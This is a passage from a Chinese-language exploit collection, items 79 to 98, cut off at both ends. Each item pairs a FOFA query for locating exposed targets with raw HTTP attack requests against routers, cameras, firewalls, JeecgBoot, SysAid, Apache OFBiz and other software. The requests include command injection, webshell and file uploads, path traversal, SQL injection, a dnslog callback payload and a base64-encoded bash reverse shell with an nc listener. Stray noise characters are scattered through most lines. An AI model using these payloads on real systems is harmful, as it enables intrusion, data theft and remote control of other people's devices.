Content-Disposition: form-data; name="target"
4 T/ d4 G6 Y% f* E2 D9 T0 [8 _1 `
/ n) Y( m. ?4 u l2 U/Applications/SkillDevelopAndEHS/
6 N; N1 ^! g8 W G# d------YsOxWxSvj1KyZow1PTsh98fdu6l--
6 A" t6 I% t. W |9 _0 ?2 X# ]2 l- W- q- w6 a- `
. e9 R8 \2 X! N" x
GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
7 l7 J2 K, K8 }0 L5 b `) K% `Host: x.x.x.x6 ~6 {1 ] u7 U
/ W$ i, T. w) b4 F( O9 m- [' C* Z: b9 c+ F% F: N
79. BYTEVALUE 百为流控路由器远程命令执行
3 j9 X: |, T2 g5 w& L+ cFOFA:BYTEVALUE 智能流控路由器# E4 q; K% W5 `- `& v% G5 b2 Y. O
GET /goform/webRead/open/?path=|id HTTP/1.1
/ {4 c- w: t4 {! @# {- R# c7 wHost:IP z( V- m4 n# y8 x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
1 I- Y- D5 E/ H3 w7 K# z5 ~Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8% B! L/ K' F* d: G6 _
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
% k+ u6 B, j3 G* m. S" oAccept-Encoding: gzip, deflate
8 u9 V, b% U+ \7 C8 P. J% z4 Y5 MConnection: close7 f. l! c; _* L2 @4 k8 n
Upgrade-Insecure-Requests: 1
( f) b- ^, D p& v) S' a- j; }+ h8 K W1 i
9 e- A, H0 a7 J2 E
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
1 J" v* l) p/ M5 v& y: {FOFA:app="速达软件-公司产品"
2 Q) a' E! P5 d& j% b! A: H6 PPOST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
6 W7 h% L8 x+ ?$ I cHost: x.x.x.x
$ M+ }+ K* Z$ M$ Z8 N# [; rUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.158 E/ T2 o# k3 k/ t! `2 Q' U
Content-Length: 276 A5 F: ]7 V) T7 S* c
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.88 ]3 l; j( D3 f6 S+ I9 ~0 B0 r
Accept-Encoding: gzip, deflate6 f: g5 w7 ]* Q% }( ?& b8 j6 d$ L
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6 @5 L2 t7 D9 Y ^3 Y2 x8 \7 ]: NConnection: close3 D; P0 _# N2 L' m3 {
Content-Type: application/octet-stream
, i0 f9 g {) E! U: F9 p; g/ mUpgrade-Insecure-Requests: 14 a8 n. [. E8 n
4 B. h z% _: E
<% out.print("oessqeonylzaf");%>) V) U; P8 `/ p& Z
: N' f6 P% j4 D& p
8 \ k. W. a0 o: E+ r. EGET /xykqmfxpoas.jsp HTTP/1.1
+ I- [5 S* E0 t" |6 o* ]# AHost: x.x.x.x
6 X& @$ L3 k2 h) k- U+ bUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15" X6 f. n1 s% }% Z
Connection: close
O( H- F9 [3 ^7 K5 M3 j& t8 {$ v" RAccept-Encoding: gzip0 k: r Y- N( A( b, {% u5 k+ A) P2 p
: y9 {; a" J% [9 t5 w
- T! k9 B# w( {5 R81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露& p* F6 ~6 i* _' N5 Y) k. Q
FOFA:app="uniview-视频监控"* k/ S2 `& j5 i
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1. f# }: G) [- I- K) j3 k2 F3 ~" a
Host: x.x.x.x
? Q/ {! \+ U! X" oUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
( I: D9 [, @5 e: M3 G" HConnection: close. Z, J b5 h, d7 E' h8 y$ Z C) A/ x
Accept-Encoding: gzip
# C* O9 \$ \. O, g
) i$ U. \8 Q. i; z( c7 F8 i- T: @- z
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
: I( K0 g }) K4 r, ^FOFA:app="思福迪-LOGBASE"
! J, X- I4 A( m w/ K& RPOST /bhost/test_qrcode_b HTTP/1.16 ~# G. `4 r; u! b
Host: BaseURL. s; ?$ z* S. S& k8 I& q
User-Agent: Go-http-client/1.1
( T9 s( V3 T$ `" WContent-Length: 23
3 c [. ^& c8 G# d, ^Accept-Encoding: gzip
6 z, R6 P, W0 x8 \$ |+ {" wConnection: close
. h# m0 g6 T. C) z5 `$ WContent-Type: application/x-www-form-urlencoded8 R: o& t$ Z( l( N- H
Referer: BaseURL
; ~8 a4 l) R! R: F& l7 d+ P6 C9 F+ N5 E5 @5 Q: s
z1=1&z2="|id;"&z3=bhost
* x6 K" N: Z- @3 H! @4 ~4 C( e0 _- q# |# W
3 O/ ^, E7 |. U# @% K- B, Z
83. JeecgBoot testConnection 远程命令执行
$ m! n/ p) J7 ]' q$ o5 VFOFA:title=="JeecgBoot 企业级低代码平台"
- s& g; o# E1 D: b% ?$ A# I; M/ g+ ^/ K9 e
7 z1 i% l$ a& o k4 tPOST /jmreport/testConnection HTTP/1.1( r9 I" Z( P3 ?7 Z/ Z7 Y0 f
Host: x.x.x.x
; z; j$ u) O0 _3 y" o( w6 w0 @+ `User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15' t! o. Q8 G6 x* y) c
Connection: close% |8 C% S/ f& }2 f3 e! S
Content-Length: 8881" d) z8 c8 P: }" D5 M! R7 K4 V$ a
Accept-Encoding: gzip9 D2 S- v; T3 ]8 s* b0 P0 I
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"6 j m$ t9 v! P
Content-Type: application/json. B& j4 P5 L0 N2 Q" R2 s) ~, q
3 |2 t/ \6 G2 z f/ o7 D
PAYLOAD
/ m4 F+ l8 w2 b* L6 ]8 c' {+ \# P f0 u2 n3 `& V9 ]$ P; l: S. c! b
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入( L5 B7 A0 S# t- e4 e! i, O
FOFA:title=="JeecgBoot 企业级低代码平台"& b: t: _4 k$ T) m0 i. I7 T+ W
0 a, p; y- ^) p, g1 x/ C7 g
$ ^( O- Y% p! b
V. ~& y! j8 a/ h, `POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.19 y7 W3 H& G/ _ h U( S. Z# X
Host: 192.168.40.130:8080
- N6 f5 {; P6 t* M3 }5 uUser-Agent: curl/7.88.18 h% R+ |% x' D
Content-Length: 156
% y" f# H! k" L" A5 iAccept: */*
7 T$ T6 h9 g) {7 UConnection: close$ b+ h# y* q" R r* ?6 `
Content-Type: application/json
1 @, I7 Z7 q5 k" kAccept-Encoding: gzip
0 N& U! P8 c! I. ~' ^! X o& h6 R/ r2 v. ~& ~( a* m. L* I
{9 h4 \' I. }+ H6 P+ Q! z- N0 x
"sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
5 {7 w- h3 O j9 j "type": "0"
; u4 c, }4 k7 C9 z8 L7 s}
# q) E+ X" Y0 M! k+ v; F6 b/ u4 Q0 b. r; `# P1 D8 c/ A. ?
3 Y; w* {5 s9 t z85. SysAid On-premise< 23.3.36远程代码执行. n" o, m; l7 c( j6 Q
CVE-2023-47246
3 m8 |$ }$ S* l( X8 bFOFA:body="sysaid-logo-dark-green.png"
' \) i8 h: z1 F c# g x8 P% sEXP数据包如下,注入哥斯拉马/ t- f( X0 S7 V: s( r) w
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
3 z/ ^$ @% }( _4 I6 W, BHost: x.x.x.x) F) V3 w: w) T ^' `; r6 l, {
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15# t) r# T2 t2 K' i# D
Content-Type: application/octet-stream
; l$ B9 W: U3 H7 o- g9 @Accept-Encoding: gzip
. Y- |3 q( Z; w# B5 G
" [8 }7 c) G2 |" X6 d8 E2 yPAYLOAD
& O; Y* z0 _. v: w3 Y: _( E! M. C b0 N3 Z
回显URL:http://x.x.x.x/userfiles/index.jsp
# V- F# [) h t) W
" j8 z* E6 i7 n, b$ C86. 日本tosei自助洗衣机RCE
! }2 b3 z8 Z" R F- O2 s& qFOFA:body="tosei_login_check.php"
0 J0 O7 ~& _4 U: \9 BPOST /cgi-bin/network_test.php HTTP/1.1
! j9 Z! d0 {! N/ ~( x5 ~, [7 s2 QHost: x.x.x.x8 S7 i, V% O* l0 O9 |9 F
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
3 Z/ m% E! {- A8 t5 r& KConnection: close- o A) s! o7 S) W% E9 E+ J- ?
Content-Length: 44
! \. F- M$ ?- \2 BAccept: */*, X+ z, W H- H! H
Accept-Encoding: gzip
. {& L) v( l' wAccept-Language: en
3 S! z4 ^- U o \Content-Type: application/x-www-form-urlencoded5 h/ b" v+ i5 C2 q) ]/ u9 [: g. H% p: c
7 Z+ [. @8 V3 {. i8 v6 ^
host=%0acat${IFS}/etc/passwd%0a&command=ping1 A2 e# M" c+ P
4 Y; w' W. ?, ?9 y% T$ ^# c" B/ [3 p' S
9 u7 y" z* v3 D2 o2 `/ `+ X: d. \
87. 安恒明御安全网关aaa_local_web_preview文件上传1 A2 @+ h9 g: d& I2 a
FOFA:title="明御安全网关") M: v& W/ B; `9 n1 m8 h
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1" l7 d0 p7 L" C' o: j
Host: X.X.X.X3 n( v9 I$ n2 G4 i+ v
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
2 Y1 d, G4 j! sConnection: close
2 r7 r: U% N* H. S: s6 bContent-Length: 198" D9 |! Z" b5 }
Accept-Encoding: gzip
9 l: d0 }4 o B/ s2 [4 o9 x1 PContent-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd
1 h' O+ N0 A' d. v9 m8 o( p+ u2 O' z5 n. F" H3 V
--qqobiandqgawlxodfiisporjwravxtvd
9 R2 J. b# {/ r& H' e* ?Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
# B1 w/ o, L9 \' aContent-Type: text/plain
) }" s f! s2 A. {/ g* u+ l$ r" E
: O/ Z; r- F- S2ZqGNnsjzzU2GBBPyd8AIA7QlDq4 @( i- r; I" v, A% w9 W5 \
--qqobiandqgawlxodfiisporjwravxtvd--
: L; Y( P0 P( t! V: ^' }
8 v, {$ W& f0 z
; U8 o6 K# C' G# N- E# e* V5 Z/jfhatuwe.php. P/ ?' C$ _7 s$ T
0 P% r8 U6 v0 a3 K0 {. t$ v
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行/ i! D o/ q9 |- H
FOFA:title="明御安全网关") f, o8 D+ ? v" W# i
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
! F* u3 o. w @7 m' P& NHost: x.x.x.xx.x.x.x/ {& w. ^- H1 [2 X+ {
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.159 o1 w8 L5 e! N: _2 `9 G
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
0 J; [+ E" N) e- f+ I% i0 }Accept-Encoding: gzip, deflate/ `* T. s7 Z% u; o( Y" j
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 Q! \- Z% ^. {- `& G4 MConnection: close
" Q; g0 W& `! C6 e# S
/ Z- {' R: _- x4 `* U6 z7 w9 b' [- ~' ~2 Q1 v% F
/astdfkhl.php
$ m8 Y3 i' K0 O7 W7 f. F: ~9 ?" l
" D( z5 ^! I" @. I89. 致远互联FE协作办公平台editflow_manager存在sql注入
& N4 a9 V( }4 ]* z9 gFOFA:title="FE协作办公平台" || body="li_plugins_download"
0 k+ G0 {/ K4 j$ O# FPOST /sysform/003/editflow_manager.js%70 HTTP/1.1- ?: |7 Y0 j1 j
Host: x.x.x.x
3 b. ?/ o* J3 l/ N/ A! PUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.151 g' m. |4 B8 Q& u( t) J
Connection: close
& Q$ S3 A# @/ w' F7 C# DContent-Length: 41
G- P D- L( DContent-Type: application/x-www-form-urlencoded2 d/ M& h' D" s* L P
Accept-Encoding: gzip
+ v" q0 n# J2 ]! c
+ R, |& Z; U3 N; q" }/ coption=2&GUID=-1'+union+select+111*222--+
) @3 i- a9 ?$ s- N( j4 k' O$ i
1 C0 F: q1 Y$ }' N$ C2 G( ^/ U, `" O5 _( q# y7 J
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
; H* w6 P- M8 tFOFA:icon_hash="-1830859634"
3 a# d6 F3 w- O) }) e3 g7 {POST /php/ping.php HTTP/1.1
. i' W& U' [! }$ d- @+ e. ZHost: x.x.x.x: w2 Q! n' l" o* W7 q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
' i/ G: [" f5 e: u8 h( |Content-Length: 51; z/ x. x2 F- @3 @: H
Accept: application/json, text/javascript, */*; q=0.01" l" R4 h1 ]9 \* A! s
Accept-Encoding: gzip, deflate( [ c* `( c7 I5 j& g) L
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2; s @2 \3 K9 R* j* U- T
Connection: close
* ~) e4 Q' A5 m. a9 R9 `Content-Type: application/x-www-form-urlencoded# r* u: `! d8 M
X-Requested-With: XMLHttpRequest
1 M/ ], `/ r! x$ ^ R5 l" x7 l& B9 U. W% z3 f9 D9 @
jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig- J( J# z2 H* U5 j8 K9 z% t
- L8 [7 C! B4 w1 K# [. n3 E( a5 ?
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取: J$ q+ ]$ ^, m* Q7 Z
FOFA:title="综合安防管理平台"5 A. n+ H- M6 [- i' V. g
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1% Z+ d& `& o; v- p& \/ j
Host: your-ip
& q2 \) K0 U4 {4 O* x wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36, L& {0 l9 ?: g; C" d# a
Accept-Encoding: gzip, deflate" h5 P# C" X; g
Accept: */*
4 P( _0 \5 B2 O" r. J8 q, ?Connection: keep-alive) F7 k) ]* U* j) f" ^" b
- M5 j" G9 \1 E- [: L: D+ l% ~
# i4 }0 R! x* z$ h7 i! k/ D. i& j. N9 ^
92. 海康威视运行管理中心session命令执行; y$ N6 }. b X
Fastjson命令执行$ ~. W% r, V- U' z
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"9 H4 H+ B( ^5 n+ f+ R+ G6 U+ ^
POST /center/api/session HTTP/1.1
( t# \: \: l5 ^7 O( GHost:9 X" {+ H) Z c( M6 K
Accept: application/json, text/plain, */*" {; q" y& X) p k" @) B3 m4 T
Accept-Encoding: gzip, deflate
% g6 c2 @; H' p; ?0 GX-Requested-With: XMLHttpRequest
1 e; I, A* r7 K1 H5 NContent-Type: application/json;charset=UTF-85 I6 f' j( q. C/ @% u# Z
X-Language-Type: zh_CN
/ @& F2 C- w3 R" n1 v, P1 h$ hTestcmd: echo test1 [) h/ C" g4 _! z. c# T/ ^
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
: [0 r6 e% E7 \& |# [Accept-Language: zh-CN,zh;q=0.9, ^& W* @; S& f+ x% @
Content-Length: 5778
* D9 `1 M( r1 H$ u, M' S6 C5 N( }' C; k0 c% w8 }
PAYLOAD$ }7 d! J3 k; m9 V1 l
. K! H9 {8 y; S0 k# I; i3 {, ~% S# N; R% \. k4 m, `
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
4 U* Q e6 E% N6 |- x" N6 HFOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="7 @* D$ A) @6 u( U3 U
POST /?g=app_av_import_save HTTP/1.19 Q, M- d; X$ E) X# H6 s; Y9 D+ ^
Host: x.x.x.x
5 ~1 F% w/ z' @) pContent-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
8 A# T% r& N. T2 n' K9 n HUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
4 G3 P& v" T& j- D
6 N& ~6 W2 H2 w$ ?6 u: K0 H------WebKitFormBoundarykcbkgdfx6 p; E# \/ u3 Q2 A6 ?7 \& G/ a
Content-Disposition: form-data; name="MAX_FILE_SIZE"0 O6 I1 F2 v. U" L6 i# q& n* I1 a
, M! f8 D0 I6 i7 F% b
10000000
9 O( x) g" q. R9 I& I. V4 }" ^------WebKitFormBoundarykcbkgdfx
A6 y: b; u. G: T( W) K0 VContent-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
5 `/ E' W) [) |5 {; g' ?Content-Type: text/plain% @ n6 _* j/ A+ M) M/ r
' K6 m' e5 n* _& Q) V2 n" K
wagletqrkwrddkthtulxsqrphulnknxa
( C1 R% x) F# e ]" K* M8 j------WebKitFormBoundarykcbkgdfx2 |4 `+ b/ v9 w9 U
Content-Disposition: form-data; name="submit_post"
; f5 d1 W5 U% s" ]2 E
3 S0 \3 }1 f. E% s* G; Hobj_app_upfile( t8 I! |' }: T2 w5 I1 ?
------WebKitFormBoundarykcbkgdfx$ s5 M* t2 d5 X4 j
Content-Disposition: form-data; name="__hash__"; `, I* G7 j6 r; K4 f% O: B+ G7 L
/ }" u5 }% O+ a, z7 j" x$ D
0b9d6b1ab7479ab69d9f71b05e0e9445
6 ?4 Q/ x& l/ j& N------WebKitFormBoundarykcbkgdfx--
3 b) q( Q% Z$ z1 p' g% W8 y0 S% o# H0 c* c
# L/ @" h0 Y& z/ A# b$ z9 C
GET /attachements/xlskxknxa.txt HTTP/1.1
$ L2 h4 s& E0 g. t& LHost: xx.xx.xx.xx& J! o7 k' x0 O$ l( M4 H
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.360 x# e( M- z3 T( ?2 s
) t, v: F" P! }3 R- X! y
# t) R* E4 u( q$ g. V. Q! ^+ o2 ~94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传$ B& B8 d% F7 I4 r6 g! q
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
5 f2 Q" \; [% L2 D. O0 E4 MPOST /?g=obj_area_import_save HTTP/1.1$ a( {6 a- U. W
Host: x.x.x.x
) N. h+ B! h$ P8 tContent-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt; O$ A+ n9 L* n b4 K
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
8 s& i2 |6 q. T7 |/ k8 J
8 g" T8 V @! R r5 |! ?7 F------WebKitFormBoundarybqvzqvmt
" _1 ?8 Y( x$ j4 B- YContent-Disposition: form-data; name="MAX_FILE_SIZE") B$ ?: |9 {) W" a7 p2 d
( H. X4 o' J" V6 j& x5 R2 x( Z4 }10000000
, G9 `1 B1 w: k3 n------WebKitFormBoundarybqvzqvmt
' D" g& e; M# t4 W, B$ kContent-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
/ K$ H; _* l$ @6 Y) Y5 n' jContent-Type: text/plain! `4 o% h; x5 V
8 L3 J: Q; t$ w' gpxplitttsrjnyoafavcajwkvhxindhmu
7 t0 X. l) h \( c& Y------WebKitFormBoundarybqvzqvmt
8 [# H+ T' K8 q8 N, @/ N5 f wContent-Disposition: form-data; name="submit_post"
! j, J" {! [4 u+ }! H6 n9 d$ p" _; l/ Z% @; C3 u s
obj_app_upfile, v* e( R2 X2 G) f1 u5 A: s
------WebKitFormBoundarybqvzqvmt
I% b3 V A" K/ i: }! c5 W; TContent-Disposition: form-data; name="__hash__"
. i7 L# B6 s7 |
$ t2 r. W+ q" X0 o* D- e0b9d6b1ab7479ab69d9f71b05e0e9445
$ p; S- b% s- H" ^* ?8 D------WebKitFormBoundarybqvzqvmt--
- `. Z& _* d- X. W/ ?% h# @, f |1 B& R- m/ }, ]. y
, V. y2 [" m2 z1 ^* [1 `) U
" V; C" N: z K D% I, A8 QGET /attachements/xlskxknxa.txt HTTP/1.11 r9 o! ^9 D+ a8 M2 R- D5 y0 @1 n- @
Host: xx.xx.xx.xx2 P, f3 [, {- k" F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.362 t, @1 B$ L4 h
; S" x# [9 j. S! I3 w0 }+ O, m+ M
2 l, ?" A9 H5 X" P
' V, o5 v+ l3 X
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
$ {- K% d5 N" F6 Z5 [9 mCVE-2023-490700 d* w6 |4 l, L" ` g$ x' u
FOFA:app="Apache_OFBiz"
n- R( ^& V" D) l1 f* fPOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.17 v: d! d! C* A" n! b3 k' e
Host: x.x.x.x
8 e# u$ u1 d/ u7 V1 ?4 ?User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
+ e% }; p/ ]7 E1 p7 `' nConnection: close
. R$ }, d) t; I$ p& {4 VContent-Length: 889
0 y+ J0 a. _6 @# GContent-Type: application/xml
/ |/ T$ }* h; B/ T8 HAccept-Encoding: gzip6 e8 u& u, u& f0 y; t2 M) C
, P5 [. P3 L0 ]+ s6 @<?xml version="1.0"?>. W- v! _; z, e1 a
<methodCall>. S/ e$ H5 ^& o* F' [
<methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
3 t7 g* A9 I. o7 G4 Q" G <params>
* q- n0 ~, P1 y& x+ O <param>! |" @! O" S! Z: N
<value>7 {/ X+ F/ [- [7 h6 C4 y% a5 ^
<struct>
; o( p% ` }5 A' u <member>$ I9 }3 I# G& x( M$ q
<name>test</name>! @& x) ?& G" F% R7 i& q: K
<value>/ Q( |3 ?. X8 k3 `# c, r W
<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>/ I& V) y0 s7 D4 v
</value>- E& [ s5 N8 `" P( T% ?6 H5 {! I5 F
</member>
) u, a3 z' b8 H5 d, R </struct>. ?# O* J+ x! D& u
</value>
' W. W1 b o9 H/ c/ u6 z </param>) ~4 T/ }- L1 P' n$ _7 |$ a
</params>6 d( p d' D0 k/ f# { l
</methodCall>) |7 E0 R' Z1 t6 N
+ n# L4 `( g8 D$ y; D4 c3 p+ D% S1 x
用ysoserial生成payload
6 _: h- g+ y: l2 ^7 b8 ]! h9 ijava -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"
k& g. f' Q; _- ]2 m9 z; w* u7 l D- r+ B0 e( d9 [
0 F x: k% U; n) \0 S- g& P+ E将生成的payload替换到上面的POC1 V, T5 M$ w) K: S" L- c+ w
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.19 E9 t2 ~5 _% E7 t
Host: 192.168.40.130:8443
: ]9 h) B8 G2 j2 pUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
% \4 S6 G- e: V3 s5 _Connection: close
' `" }: j+ m: R% QContent-Length: 889
5 G* l& F0 v) C9 d& {% {% Q" ]6 cContent-Type: application/xml; [& k1 W& h( a2 y/ @0 Y
Accept-Encoding: gzip
' O/ r- H8 R" S- r/ l$ ~7 c: u- Z" ]
PAYLOAD+ l/ ~+ s. a+ N4 i% a, C6 I% w
6 L$ v" j# ? Y: h) I) O96. Apache OFBiz 18.12.11 groovy 远程代码执行# B4 C, A: U0 M- l# y
FOFA:app="Apache_OFBiz"
% \4 I1 G" p7 L# m1 K0 iPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.16 m: s4 [ b- |2 I1 G! b. W* m
Host: localhost:8443. w+ i/ c' y7 ~! n# N/ D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
- R9 X( L$ V# Y4 N- `1 q$ v. zAccept: */*
2 I6 T* I2 ]$ ?5 E6 L9 U! iAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 r3 M2 f4 B' m$ ~ B& L. W
Content-Type: application/x-www-form-urlencoded6 O2 X8 ]9 N0 D) `' n+ E
Content-Length: 55
. v/ t" U, o N$ ]/ t4 ]0 w# I: w8 t% \" s8 k9 D& u H3 q/ y
groovyProgram=throw+new+Exception('id'.execute().text);3 W$ w* A- S' z8 x B
& m8 [9 V. y( g- R) a7 f- x% v E% M- ~. Y
反弹shell
; L ]* J5 {7 g, R: ?3 ^1 d0 V在kali上启动一个监听% B, _5 s! h0 O: ~
nc -lvp 7777* r" c' z \2 ~8 e8 n; |1 H; C
2 B1 [+ Q/ X s2 m1 _' y
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
$ M; ~. g0 m- l; cHost: 192.168.40.130:84437 F e9 j, J$ Z' P6 T" J
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
- X/ C5 ?: @( h2 \9 a. ?Accept: */*- M8 r7 x" P: g; g$ B2 B) ]) E
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
) _- b1 |+ T/ C' X G- U. l2 dContent-Type: application/x-www-form-urlencoded
* o. y6 R# b, g' V% q6 b; @Content-Length: 71+ E% Q2 e, c3 l# J' g* c2 h
( L" Y4 O% `2 u% p' ~) LgroovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();! \9 I9 J' W9 r9 x% ?
, n9 Y# @& p* o7 g# d( U; t! I9 S
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行; R1 t" p# r2 f7 x/ W" B
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
- s0 I1 i; \! g; z. TGET /passport/login/ HTTP/1.1
4 ]! N5 T/ p4 wHost: 192.168.40.130:8085
- @7 {+ J9 K) Z! T& x3 LUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15! ^3 Z# s/ M6 m; J+ j
Accept-Encoding: gzip
_2 l, W; P& |- f1 uConnection: close0 p4 |5 m% B3 x6 H0 m; G+ R3 [
Cookie: rememberMe=PAYLOAD- ]8 M* @# n9 d: [+ Y+ m
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"* |9 ]! C p6 |, e9 [+ N ^' U
' y+ |; {- }) e9 {7 B' x# }
7 B* Q7 _ E1 v+ K( u- p' W7 |98. SpiderFlow爬虫平台远程命令执行5 m" H1 L% S) Y U" @
CVE-2024-0195
: q' A. r' m# z" b9 pFOFA:app="SpiderFlow"0 U! |6 i0 k3 r2 J
POST /function/save HTTP/1.1
s0 z$ G. A; a- ~Host: 192.168.40.130:80884 V& g2 G2 k1 w$ |" v |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0; [; O* U; M+ t. W3 k) O3 d
Connection: close
+ h) A$ [' \8 `$ t$ u6 i0 kContent-Length: 121+ z2 N5 c G9 i3 M, |* S( ~
